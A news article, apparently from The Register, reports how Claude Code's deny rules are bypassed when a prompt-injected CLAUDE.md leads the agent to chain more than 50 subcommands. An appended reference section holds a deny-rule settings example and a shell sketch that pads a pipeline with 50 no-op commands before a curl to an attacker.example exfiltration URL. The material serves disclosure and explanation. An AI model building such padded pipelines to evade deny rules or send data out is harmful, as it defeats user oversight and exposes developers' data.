Claude Code bypasses safety rule if given too many commands • The Register

Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long chain of subcommands. This vuln leaves the bot open to prompt injection attacks.

Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code's source.

Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of these, like curl, which enables network requests from the command line, might pose a security risk if invoked by an over-permissive AI model.

One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands. For example, to prevent Claude from using curl via ~/.claude/settings.json, you'd add something like { "deny": ["Bash(curl:*)"] }.

But deny rules have limits. The source code file bashPermissions.ts contains a comment that references an internal Anthropic issue designated CC-643. The associated note explains that there's a hard cap of 50 on security subcommands, set by the variable MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. Beyond 50, the agent falls back to asking the user for permission. The comment explains that 50 is a generous allowance for legitimate usage.

"The assumption was correct for human-authored commands," the Adversa AI Red Team said in a writeup provided to The Register. "But it didn't account for AI-generated commands from prompt injection – where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process."

The Adversa team's proof-of-concept attack was simple. They created a bash command that combined 50 no-op "true" subcommands and a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.

In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But developers often grant automatic approval to agents (--dangerously-skip-permissions mode) or just click through reflexively during long sessions. The risk is similar in CI/CD pipelines that run Claude Code in non-interactive mode.

Ironically, Anthropic has already developed a fix – a parser referred to as "tree-sitter" that is also evident in its source code and is available internally but not in public builds.

Adversa argues that this is a bug in the security policy enforcement code, one with regulatory and compliance implications if left unaddressed.

A fix would be easy. Anthropic already has "tree-sitter" working internally, and a simple one-line change – switching the "behavior" key from "ask" to "deny" at line 2174 of bashPermissions.ts – would address this particular vulnerability.

Anthropic did not immediately respond to a request for comment. ®
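For reference, the deny rule quoted in the article lives in Claude Code's settings file. The article shows the rule bare; in Claude Code's published settings documentation, deny rules sit under a "permissions" key, so a minimal ~/.claude/settings.json would look roughly like this (treat the exact layout as a sketch, not gospel):

```json
{
  "permissions": {
    "deny": [
      "Bash(curl:*)"
    ]
  }
}
```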
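The mechanism is easiest to see in miniature. The sketch below is not Anthropic's code – bashPermissions.ts is TypeScript, and its internals are only partially known from the leak – but it reproduces in shell the behavior the article describes: pipelines at or under the 50-subcommand cap are checked against deny rules, while longer ones fall back to asking the user, which is exactly what the Adversa proof of concept (50 no-op "true" subcommands plus one curl) exploits. The attacker URL is made up for illustration.

```shell
#!/bin/sh
# Illustrative sketch only, NOT Anthropic's actual code. MAX mirrors the
# reported MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50 constant.
MAX=50

decide() {
  # Count subcommands by splitting on "&&", as a stand-in for the real
  # security check that gives up past the cap.
  n=$(printf '%s' "$1" | awk -F'&&' '{print NF}')
  if [ "$n" -gt "$MAX" ]; then
    echo "ask"     # cap exceeded: security check skipped, user is asked
  elif printf '%s' "$1" | grep -q 'curl'; then
    echo "deny"    # a deny rule like Bash(curl:*) would block this
  else
    echo "allow"
  fi
}

short_verdict=$(decide "curl https://attacker.example/exfil")

# Adversa-style pipeline: 50 no-op "true" subcommands plus one curl,
# for 51 subcommands in total.
pipeline="true"
i=2
while [ "$i" -le 50 ]; do pipeline="$pipeline && true"; i=$((i + 1)); done
pipeline="$pipeline && curl https://attacker.example/exfil"
long_verdict=$(decide "$pipeline")

echo "$short_verdict"  # deny: under the cap, the rule applies
echo "$long_verdict"   # ask: 51 subcommands, so the check is bypassed
```

The suggested one-line fix – returning "deny" rather than "ask" once the cap is exceeded – would close the bypass in this sketch too: a fail-closed default instead of fail-open.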